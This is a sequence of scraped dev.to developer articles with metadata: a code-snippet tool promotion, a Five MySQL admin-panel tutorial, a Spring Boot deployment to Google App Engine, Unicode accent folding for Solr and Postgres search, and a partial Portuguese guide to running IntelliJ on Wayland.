![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qdnzmfdpcxx0zaer3y5d.png) Are you a tech content writer wanting to share your code on your website in a fancy way? Are you bored of the default code snippet style that your theme is forcing you to use? We found a solution for you, and it is totally free. Introducing [SnippetEase](https://devtool.site/), a free code snippet generator that transforms the way you share code on your blog. With SnippetEase, you can present your code elegantly and professionally, making it easier for your readers to understand and appreciate your work. The best part? It works seamlessly on both Blogger and WordPress, or any website that supports custom HTML. Key Features of SnippetEase: - Customizable Design: Tailor the look of your code snippets to match your blog's aesthetic. - Easy Integration: Simple to use and integrate, even if you're not a coding expert. - Multi-Platform Compatibility: Perfect for Blogger, WordPress, and any site that supports custom HTML. - Free to Use: Enjoy all these features without spending a dime. How to use SnippetEase on WordPress: First, type or paste your code into SnippetEase, choose your language and your theme, then check the preview section to see whether you like the result. After getting the results you desire, click on "Generate and Copy Styled HTML"; this automatically copies an HTML snippet that represents your code snippet. Now, go to WordPress, create a post, and for the block, select "Custom HTML" and paste the HTML code in that block. Congratulations, you will now have something like this: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/snby2ca8i1ijhfdq8cyq.png) Check out [our Mechatronics Blog](https://munjitso.engineer/) to learn more and to support us. Say goodbye to bland, default code snippets and hello to a more engaging and visually appealing way to share your knowledge. Try [SnippetEase](https://devtool.site/) today and enhance your tech content like never before!
munjitso
1,912,051
How to Build a MySQL Admin Panel (Fast & Easy)
How to Build a MySQL Admin Panel (4 Easy Steps) In this guide, we will walk you through the four...
0
2024-07-04T23:33:43
https://five.co/blog/how-to-build-a-mysql-admin-panel/
mysql, beginners, tutorial, database
<!-- wp:heading --> <h2 class="wp-block-heading">How to Build a MySQL Admin Panel (4 Easy Steps)</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>In this guide, we will walk you through the four steps required to build a MySQL admin panel:</p> <!-- /wp:paragraph --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Creating a New Application with Five</strong>: Get started by setting up a new application in the Five environment.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Setting Up a MySQL Database</strong>: Design and create tables and fields for your MySQL database, defining both data and display types.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Developing Forms</strong>: Build user-friendly forms to enable CRUD (Create, Read, Update, Delete) operations on your MySQL database.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Deploying the Application</strong>: Easily launch your admin panel to the cloud.</li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:paragraph --> <p>By following these steps, you'll create a custom MySQL admin panel interface, providing end-users with a graphical user interface or <a href="https://five.co/blog/how-to-create-a-front-end-for-a-mysql-database/">frontend</a> to interact with your data.</p> <!-- /wp:paragraph -->
}","tab":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t::before { content:none }.eb-parent-eb-toc-e787t { display:block }","mobile":".editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { display:block }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t { filter:none }.editor-styles-wrapper.wp-embed-responsive .eb-parent-eb-toc-e787t::before { content:none }.eb-parent-eb-toc-e787t { display:block }"}} /--> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Building a MySQL Admin Panel using Five</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five is an all-in-one development environment that simplifies the process of building, maintaining, and deploying custom web applications. Whether you're a startup or a large enterprise, Five offers a standardized, rapid approach to application development, making it an ideal choice for creating data-driven solutions.</p> <!-- /wp:paragraph --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">How Five Compares to Traditional Tech Stacks</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five integrates several technologies into one cohesive platform, providing everything needed for modern web application development. Applications built with Five use a MySQL database, are extensible through SQL, JavaScript, and TypeScript, and have an auto generated UI for the front end. Also they can be automatically deployed to the cloud taking the hassle out of completely self-managed hosting.</p> <!-- /wp:paragraph --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Advantages of Using Five Over Traditional Stacks</h3> <!-- /wp:heading --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Faster Development</strong>: Start building applications immediately without the time-consuming setup of traditional stacks.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Ease of Use</strong>: Access all necessary tools within Five, eliminating the need for multiple external tools and interfaces.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Flexibility</strong>: Extend applications with custom code and integrate popular technologies like webhooks and APIs.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Simplified Front-End and Back-End Development</strong>: Even developers without expertise in full-stack development can create and deploy applications easily.</li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:tadv/classic-paragraph --> <div style="background-color: #001524;"><hr style="height: 5px;"> <pre style="text-align: center; overflow: hidden; white-space: pre-line;"><span style="color: #f1ebda; background-color: #4588d8; font-size: calc(18px + 0.390625vw);"><strong>Create A MySQL Admin Panel</strong> <span style="font-size: 14pt;">Sign Up to Follow this Tutorial</span></span></pre> <p style="text-align: center;"><a href="https://five.co/get-started/" target="_blank" rel="noopener"><button style="background-color: #f8b92b; border: none; color: black; padding: 20px; text-align: center; text-decoration: none; display: inline-block; font-size: 18px; cursor: pointer; margin: 4px 2px; border-radius: 5px;"><strong>Start For Free</strong></button><br></a></p> <hr 
style="height: 5px;"></div> <!-- /wp:tadv/classic-paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Step by Step: How to Build a MySQL Admin Panel</h2> <!-- /wp:heading --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 1: Create a New Application with Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>To start, <a href="https://five.co/get-started/">sign up for Five’s free trial.</a> Follow these steps to create a new application:</p> <!-- /wp:paragraph --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Access Applications</strong>: Click on "Applications" in the top left corner.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Add New Application</strong>: Click the yellow Plus button.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Name Your Application</strong>: Enter a descriptive name in the Title field and save it by clicking the tick mark in the top right corner.</li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3225,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/image-31-1024x617-1.png" alt="" class="wp-image-3225"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>You’ll see your new application in the list. Click on the blue "Manage" button in the top right corner to access all of Five’s development features.</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":3226,"sizeSlug":"large","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-large"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Manage-Your-Application-3-1024x576.png" alt="" class="wp-image-3226"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Don’t worry about customizing application settings initially. The default choices are sufficient to start creating your MySQL admin panel.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 2: Set Up a MySQL Database with Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Next, create your MySQL database within Five. 
Five provides an integrated environment, eliminating the need for external MySQL GUIs.</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Access Data Management</strong>: Click on "Manage," then "Data," and select "Table Wizard."</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3227,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Table-Wizard-1024x649-4.png" alt="" class="wp-image-3227"/></figure> <!-- /wp:image --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Create Database Tables</strong>: Use the Table Wizard to:<!-- wp:list --> <ul><!-- wp:list-item --> <li>Create new tables from scratch.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Assign data and display types to fields.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Build relationships between tables using primary and foreign keys.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Import CSV files directly into your tables.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li>Add new fields to existing tables.</li> <!-- /wp:list-item --></ul> <!-- wp:image {"align":"center","id":3228,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Create-a-Table-with-the-Table-Wizard-1024x627-1.png" alt="" class="wp-image-3228"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>For a detailed tutorial on creating your first database table, refer to Five’s Quick Start Guide or watch this YouTube video.</p> <!-- /wp:paragraph --> <!-- wp:embed {"url":"https://www.youtube.com/watch?v=jcRAhyw9rmI\u0026list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ","type":"video","providerNameSlug":"youtube","responsive":true,"align":"center","className":"wp-embed-aspect-16-9 wp-has-aspect-ratio"} --> <figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper"> https://www.youtube.com/watch?v=jcRAhyw9rmI&amp;list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ </div></figure> <!-- /wp:embed --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Five automatically creates primary keys and foreign key fields when you establish a relationship between tables. The primary key field is named "TableNameKey" and stored as a GUID.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 3: Develop Forms with Five</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>With your database tables set up, it’s time to create forms for user interaction.</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Access Form Wizard</strong>: Click on "Visual," then "Form Wizard" in the menu.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3229,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Form-Wizard-1024x650-7.png" alt="" class="wp-image-3229"/></figure> <!-- /wp:image --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Select Database Table</strong>: Choose the table your form will interact with. 
For example, if your table is named "Inventory," select it to generate corresponding fields.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3230,"sizeSlug":"full","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-full"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Form-Wizard-Creating-a-form-1024x656-3.png" alt="" class="wp-image-3230"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Five makes it easy to build a CRUD application with its seamless integration of the MySQL database. Watch this YouTube video for a step-by-step guide on creating forms.</p> <!-- /wp:paragraph --> <!-- wp:embed {"url":"https://www.youtube.com/watch?v=C-P0vgwrU6s\u0026list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ\u0026index=2","type":"video","providerNameSlug":"youtube","responsive":true,"align":"center","className":"wp-embed-aspect-16-9 wp-has-aspect-ratio"} --> <figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper"> https://www.youtube.com/watch?v=C-P0vgwrU6s&amp;list=PLerqEA4wsHa2vY5vW3fK1Nkl4Npxn5MKQ&amp;index=2 </div></figure> <!-- /wp:embed --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Start with a simple form and explore customization options later. You can adjust field sizes, apply conditional logic, use custom display types, and assign events to user actions.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Step 4: Launch the Application</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>After setting up your database and forms, it’s time to launch your application.</p> <!-- /wp:paragraph --> <!-- wp:list --> <ul><!-- wp:list-item --> <li><strong>Run Your Application</strong>: Click the "Run" button in the top-right corner to preview your application.</li> <!-- /wp:list-item --></ul> <!-- /wp:list --> <!-- wp:image {"align":"center","id":3231,"sizeSlug":"large","linkDestination":"none"} --> <figure class="wp-block-image aligncenter size-large"><img src="https://five.co/wp-content/uploads/2024/07/Five.Co-Run-Your-Application-5-1024x576.png" alt="" class="wp-image-3231"/></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>Five automatically generates a clean and intuitive <a href="https://five.co/blog/the-admin-panel-the-best-web-app-template/">admin panel interface</a>. The user interface includes a navigation menu, in-app help, and a user avatar for multi-user applications. The main area allows users to interact with your forms, charts, dashboards, and other elements.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: If building locally, you can deploy the application only in your development environment. With a paid subscription, Five provides development, testing, and production environments for each application, simplifying release management.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading {"level":3} --> <h3 class="wp-block-heading">Understanding the Admin Panel Interface</h3> <!-- /wp:heading --> <!-- wp:paragraph --> <p>Five’s user interface is designed for data-driven, multi-user business applications. It includes components for displaying data, such as ratings, date pickers, and radio buttons. 
The interface is responsive, adjusting to various screen sizes from mobile phones to desktops.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p><strong>Expert Tip</strong>: Consider your end users' experience carefully. For mobile dashboards, keep the number of columns and rows minimal for better usability.</p> <!-- /wp:paragraph --> <!-- wp:separator --> <hr class="wp-block-separator has-alpha-channel-opacity"/> <!-- /wp:separator --> <!-- wp:heading --> <h2 class="wp-block-heading">Conclusion: Create a MySQL Admin Panel</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>By following these steps, you can efficiently build a MySQL admin panel using Five. This platform offers a comprehensive development environment, allowing you to create, manage, and deploy applications with ease. Whether you are a startup or a large enterprise, Five provides the tools you need to develop powerful, data-driven solutions quickly.</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>If you're serious about building with SQL, give Five a try. Sign up for free access to Five’s development environment and start building your next web application today.</p> <!-- /wp:paragraph -->
domfive
1,912,034
Deploy a Java application using Spring Boot on Google Cloud
Google Cloud offers many other features that you can configure, such as databases, storage,...
0
2024-07-04T23:15:33
https://dev.to/marioflores7/deploy-a-java-application-using-spring-boot-on-google-cloud-4mik
Google Cloud offers many other features that you can configure, such as databases, storage, monitoring, and more. Use Google App Engine, which is a serverless platform that makes it easy to deploy and automatically scale applications. Next, I'll show you how to do it. Step 1: Set up your environment 1. Install Google Cloud SDK: If you don't have it installed yet, follow the instructions here. 2. Initialize Google Cloud SDK: Set up your Google Cloud environment by running: **gcloud init** 3. Install the App Engine plugin: gcloud components install app-engine-java Step 2: Create a Spring Boot Application 1. Create a Spring Boot project: **o Project: Maven Project o Language: Java o Spring Boot: 2.5.x o Project Metadata: Enter the name of your group, artifact, and other details. o Dependencies: Add Spring Web.** Then, build the project and download the ZIP file. Unzip the file on your machine. 2. Create the Spring Boot application: Open your project in your favorite IDE. 3. Create a simple controller: In the directory src/main/java/com/example/demo (adjust according to your structure), create a file called HelloController.java with the following content: package com.example.demo; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RestController; @RestController public class HelloController { @GetMapping("/") public String hello() { return "Hello, World!"; } } 4. Make sure the application runs: Run your application with the mvn spring-boot:run command and verify that you can access http://localhost:8080 and see the "Hello, World!" message. Step 3: Prepare your app for App Engine 1. Create the app.yaml file: In the root directory of your project, create a file called app.yaml with the following content: **runtime: java11 instance_class: F1** This file tells App Engine to use the Java 11 runtime. 2. Package your application: Build your application to generate the executable JAR file. Use the Java 11 runtime environment. **mvn clean package** Step 4: Deploy the app to Google App Engine 1. Deploy the application: **gcloud app deploy target/demo-0.0.1-SNAPSHOT.jar** Follow the instructions and confirm the deployment when prompted. 2. Open the application: **gcloud app browse** Your Spring Boot application should now be deployed on Google App Engine. You can update the code and redeploy using the same gcloud app deploy command.
marioflores7
1,910,973
Considerations for Unicode and Searching
In previous posts here and on Twitter (now X) I've written about using Unicode and UTF-8 in general...
0
2024-07-04T23:06:41
https://dev.to/mdchaney/considerations-for-unicode-and-searching-jo4
postgres, unicode
In previous posts here and on Twitter (now X) I've written about using Unicode and UTF-8 in general application development. In this article I'm going to expand a bit on how to handle searching when Unicode is present. To quickly summarize using Unicode in modern application development - it's probably something you won't even have to think about if you're using a modern high-level language. Strings are almost universally assumed to be in UTF-8 format, so everything just works. The biggest problem is when importing data from outside - there's still a ton of code out there that is writing using older 8-bit encodings (generally Latin-1/ISO-8859-1 in the western world) so it's best to check your data and force it to UTF-8 before processing. With that out of the way, let's consider "Beyoncé". Why? For purposes of this discussion simply because that name has a [Latin Small Letter E with Acute](https://www.compart.com/en/unicode/U+00E9) character - also known as "eacute" - in it. ```bash michael-chaneys-computer-2:~ mdchaney$ hexdump -C Beyoncé 00000000 42 65 79 6f 6e 63 c3 a9 0a |Beyonc...| ``` In this hex dump, "c3 a9" is the two-byte UTF-8 encoding for unicode character E9. In a text file, on this web site's database, etc. that will be stored as the two bytes that you see above. Here's the issue, though. If I'm searching for "Beyoncé" - how do I even get a funky accent thing above the "e"? I'll tell you how if you're on a Mac - press "option e", let them both up, then press the vowel over which you wish to place the acute symbol. In other words, option-e, then e. Beyoncé. So, that's it, right? Of course not. Let's say I have a music database (I really do have a bunch of them) and Beyoncé is in there. I want people to be able to search for her name and find her music. The problem? I'll tell you what the problem is - a bunch of Neanderthals using the internet that don't know that little Mac trick that I learned 2 minutes ago about typing an e-with-an-acute-mark from my keyboard. Okay, I'll confess. Even I would just type in "beyonce" if I was searching for her music. Not even a capital B, much less the funky acute mark over the e. Google has been so good for so long that we expect that search to just work because it always has at Google. So, how do we handle this when we write the search code? Well, what are we using for search? I want to spend the brunt of this article talking about how to do this in Postgres, partly because it's a little more difficult there. But let me start in [Apache Solr](https://solr.apache.org/), which is where I first worked on these issues. ## Apache Solr Configuration Solr is based on the [Lucene](https://lucene.apache.org/) library, as is [Elastic](https://www.elastic.co/). I mention this because these two search engines provide most private web site search capabilities on the internet. I started using Lucene around 25 years ago in Perl - it works well. In Apache Solr, there's a filter that can be added to the config for a search index called the "[ASCIIFoldingFilter](https://github.com/Orbiter/lucene-solr/blob/trunk/modules/analysis/common/src/java/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.java)". The code is a sight to behold, as it contains the logic for turning "Beyoncé" into "Beyonce". There's another case folder to further turn that into "beyonce". Go ahead and check out the source code linked above. I would direct your attention specifically to line 434 which matches "é", aka "latin small letter e with acute". 
If you scroll all the way to line 474 you'll find that the "é" along with 40 other friends gets mapped to a plain old "e". You've probably caught on even though I haven't explicitly stated it yet: for purposes of searching we have to get our text into the simplest form possible both for storage as well as for searching. After we munge both sets of data in the same way, we end up with this being stored: ``` beyonce ``` And any of these terms matching: ``` Beyoncé beyoncé Beyonce beyonce ``` Oddly enough, a bunch of things map to the plain old "e", so: ``` Beyoncǝ ``` also works. If you want to *really* get nuts, Imagine all the things that map to any of those letters. ``` ⓑǝẙǾɳꜾᶔ ``` If you run that string through the solr.ASCIIFoldingFilter, you'll get "beyonce" out the other side. I'm not saying that so that you can do it, although nobody's stopping you. The point is that there are many characters that map to any single ASCII character in this scenario. They will be stored in plain ASCII where possible. There are plenty of Unicode characters that *won't* be changed to anything else, by the way. Emojis are a common group of characters that'll go straight through. Chinese characters (regardless of what the multi-lingual genius at the tattoo parlor tells you) don't actually map to ASCII characters and vice versa. Same with Korean, Thai, Arabic, etc. In fact, the vast majority of Unicode characters are untouched by ASCIIFoldingFilter. But, for standard text from the Western World (The Americas and Europe) the characters will map down to the closest ASCII equivalent. Accents, umlauts, little circles - all those things get dropped for indexing. Apache Solr is a great search engine and I've used it extensively for well over a decade. It handles all of this text munging extremely well. But I also use PostgreSQL and it has a very robust full-text search engine built right in that might be good for your project, especially if you're already using it as your RDBMS data store. ## Configuring PostgreSQL For Search I love Postgres and use it just about everywhere. But the full-text search functionality requires a little bit of work to handle text in the manner that you want it to. Thankfully, their documentation is great, AI assistants such as ChatGPT and Claude seem to know everything about this subject, and Postgres itself comes with some awesome tools to make testing a breeze. Solr comes with various filters that you can use to munge your input text into the output text. Postgres has fewer available options, but the default setup is pretty good for English text. This includes a standard "stopword" dictionary to keep common words out of your index, implement case folding, and word stemming. Relevant to our discussion today, it also comes with the "unaccent" dictionary to handle fixing "Beyoncé", and "mañana", and whatever else you might come up with. But it's not included by default, so you'll have to do a little work. Let's first see how it handles all of this by default. Postgres includes the excellent "ts_debug" function which allows you to see exactly what it thinks about your text. 
``` img3_dev=> select * from ts_debug('Beyoncé is coming mañana'); alias | description | token | dictionaries | dictionary | lexemes -----------+-------------------+---------+----------------+--------------+----------- word | Word, all letters | Beyoncé | {english_stem} | english_stem | {beyoncé} blank | Space symbols | | {} | | asciiword | Word, all ASCII | is | {english_stem} | english_stem | {} blank | Space symbols | | {} | | asciiword | Word, all ASCII | coming | {english_stem} | english_stem | {come} blank | Space symbols | | {} | | word | Word, all letters | mañana | {english_stem} | english_stem | {mañana} ``` This shows the default parser in action. "is" is a stop word, so it gets kicked out. "coming" is run through the default stemmer and is normalized as "come". But "Beyoncé" and "mañana" pass through unchanged save for being downcased. Now, one can make the case that letters like "é" and "ñ" don't occur in regular English so this is the proper functionality. I'm handling searches where names are a common element in the search, and accented characters are much more common in names. Even if we restrict ourselves to the United States where English is the most common language, clearly Spanish is the second most common and French is quite common as well. It's not just Beyoncé - Michael Bublé has an e-with-acute in his name as well. And many others. Just searching Google for "singers with accents in their names" brings up a litany of issues from programmers handling this situation. Look at this one, which also seems to be based on lack of Unicode normalization: https://www.discogs.com/forum/thread/826212 Here's someone talking about this problem in 2009: https://musicmachinery.com/2009/04/10/removing-accents-in-artist-names/ Anyway, the point is that even if you're handling straight English text, removing diacritics is important for name matching. And since the English language doesn't have diacritics, it won't really hurt to turn those letters into their straight ASCII equivalent since they won't exist outside of names or some non-English words. We have to create the "unaccent" extension in our database, create the new text search configuration, and finally modify it to add "unaccent" to the mix. ``` img3_dev=> CREATE EXTENSION IF NOT EXISTS unaccent; CREATE EXTENSION img3_dev=> CREATE TEXT SEARCH CONFIGURATION music_search ( COPY = english ); CREATE TEXT SEARCH CONFIGURATION img3_dev=> ALTER TEXT SEARCH CONFIGURATION music_search ALTER MAPPING FOR hword, hword_part, word WITH unaccent, english_stem; ALTER TEXT SEARCH CONFIGURATION img3_dev=> select * from ts_debug('music_search', 'Beyoncé is coming mañana'); alias | description | token | dictionaries | dictionary | lexemes -----------+-------------------+---------+-------------------------+--------------+----------- word | Word, all letters | Beyoncé | {unaccent,english_stem} | unaccent | {Beyonce} blank | Space symbols | | {} | | asciiword | Word, all ASCII | is | {english_stem} | english_stem | {} blank | Space symbols | | {} | | asciiword | Word, all ASCII | coming | {english_stem} | english_stem | {come} blank | Space symbols | | {} | | word | Word, all letters | mañana | {unaccent,english_stem} | unaccent | {manana} ``` Note that ts_debug isn't perfect. 
If you run this through `to_tsvector`, you get a slightly different result: ``` img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana'); to_tsvector -------------------------------- 'beyonc':1 'come':3 'manana':4 ``` Note that the stemming algorithm turns "beyonce" into "beyonc", and that's fine. The words will match. To show you how this works, consider the following queries where I use the standard built-in "english" search configuration: ``` img3_dev=> select to_tsvector('english', 'Beyoncé is coming mañana') @@ to_tsquery('english', 'beyoncé'); ?column? ---------- t (1 row) img3_dev=> select to_tsvector('english', 'Beyoncé is coming mañana') @@ to_tsquery('english', 'beyonce'); ?column? ---------- f (1 row) ``` If we search for "beyoncé", it's a match, but if we search for "beyonce" there's no match. Switching to our new "music_search" configuration: ``` img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana') @@ to_tsquery('music_search', 'beyonce'); ?column? ---------- t (1 row) img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana') @@ to_tsquery('music_search', 'beyoncé'); ?column? ---------- t (1 row) ``` There it is - works either way. I would also note that the "unaccent" dictionary in Postgres has fewer mappings than the ASCIIFoldingFactory in Solr. But, quite a few are still there: ``` img3_dev=> select to_tsvector('music_search', 'Beyoncé is coming mañana') @@ to_tsquery('music_search', 'Ƃⅇẙỗɳcᶔ'); ?column? ---------- t (1 row) ``` If you want to see the dictionary, Postgres has these stored under your "share" directory, basically ".../share/postgresqlxx/tsearch_data", where "xx" is the version number. Depending on the installation, this will likely be under "/usr", but it might be under "/usr/local" or wherever Postgres is installed. You can view the "unaccent.rules" file to see the list. As an aside, if you want to gꝏf around (see what I did there?) with it and come up with weird ways to spell "Beyoncé" so it'll match, use "grep": ```bash michael-chaneys-computer-2:dl5 mdchaney$ grep 'o$' /opt/local/share/postgresql16/tsearch_data/unaccent.rules ò o ó o ô o õ o ö o ø o ō o ŏ o ő o ơ o ǒ o ǫ o ǭ o ȍ o ȏ o ȫ o ȭ o ȯ o ȱ o ṍ o ṏ o ṑ o ṓ o ọ o ỏ o ố o ồ o ổ o ỗ o ộ o ớ o ờ o ở o ỡ o ợ o ℅ c/o № No ℴ o ⱺ o ꜵ ao ꝋ o ꝍ o ꝏ oo o o ``` That shows you all the characters that will map to "o". Do that for all the letters, choose your favs, copy/paste, you get the idea. ## Outtro There's a lot to configuring a full-text search application on Postgres, but if you're going to search names this is pretty much required. And it's not difficult. Feel free to hit me up in comments here or on X (@MichaelDChaney) for any further ideas that you might need help with.
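As a postscript to the Postgres setup above, here is a minimal Node/TypeScript sketch of how an application might query a table through the `music_search` configuration, plus an application-side accent-folding helper in the spirit of Solr's ASCIIFoldingFilter. The `tracks` table, its columns, and the `pg` connection details are assumptions for illustration, not something from this article.

```typescript
import { Pool } from "pg"; // npm install pg

// Connection settings are read from the standard PG* environment variables.
const pool = new Pool();

// Application-side fallback: strip combining marks (accents) for Western text,
// similar in spirit to the unaccent dictionary, e.g. "Beyoncé" -> "Beyonce".
export function foldAccents(text: string): string {
  return text.normalize("NFD").replace(/[\u0300-\u036f]/g, "");
}

// Search a hypothetical "tracks" table using the music_search configuration
// created above. Both the stored text and the query term go through the
// unaccent + english_stem chain, so "beyonce" matches "Beyoncé".
export async function searchTracks(term: string) {
  const { rows } = await pool.query(
    `SELECT id, artist, title
       FROM tracks
      WHERE to_tsvector('music_search', artist || ' ' || title)
            @@ plainto_tsquery('music_search', $1)`,
    [term]
  );
  return rows;
}
```

In a real schema you would typically store a precomputed `tsvector` column (kept current via a generated column or trigger) with a GIN index on it, rather than calling `to_tsvector` per row at query time.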
mdchaney
1,912,032
How to use IntelliJ IDEA or Android Studio on Wayland
Motivation Since I use IntelliJ IDEA and Android Studio a lot on Fedora, I was a...
0
2024-07-04T22:57:42
https://dev.to/danroxha/como-usar-intellij-idea-ou-android-studio-no-wayland-27ga
wayland, linux, intellij, java
## Motivation Since I use IntelliJ IDEA and Android Studio a lot on [Fedora](https://fedoraproject.org/), I was a bit bothered by the blurry appearance of both IDEs, as I have definitively adopted [_Wayland_](https://wayland.freedesktop.org/) as my default. ## Considerations Wayland support in IntelliJ is currently experimental (beta), so visual bugs may exist. - OS: - Fedora 40 - [GNOME Shell 46.2](https://www.gnome.org/) - IntelliJ - Flatpak version - Java - jbr jcef 21.0.3 linux x64 b509.4 ## Getting a compatible Java. To use IntelliJ on Wayland at the moment, you need a development build of the JDK starting from v21. To download a development build, go to https://github.com/JetBrains/JetBrainsRuntime/releases. The version I will use in this tutorial is [jbr_jcef-21.0.3-linux-x64-b509.4.tar.gz](https://cache-redirector.jetbrains.com/intellij-jbr/jbr_jcef-21.0.3-linux-x64-b509.4.tar.gz) Unpack the _tar.gz_ with whatever tool you prefer, and move the directory somewhere other than Downloads (just to avoid deleting it the next time you clean up your _Downloads_ folder and messing things up :smile:) The path where I chose to keep the JDK on my PC: <code>~/Programs/IntelliJ/jbr_jcef-21.0.3-linux-x64-b509.4/bin</code> ## Installing IntelliJ via Flatpak. If you need to set up Flatpak on your computer, follow the instructions at https://flathub.org/pt-BR/setup ### Store GNOME provides a software store for installing apps. Search for [IntelliJ IDEA](https://flathub.org/pt-BR/apps/com.jetbrains.IntelliJ-IDEA-Community) and install it (Next, Next, Next :smile:) 1. ![GNOME Software icon](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nz15u2s1x77zi8q66xlb.png) 2. ![GNOME Software - searching for the app](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m2tzolrexsiwrw463ll0.png) ### Command line To install via the CLI, open a terminal emulator and run the command below. ```sh flatpak install flathub com.jetbrains.IntelliJ-IDEA-Community ``` ### Support A tool that will be a great help at this point is Flatseal ![Flatseal 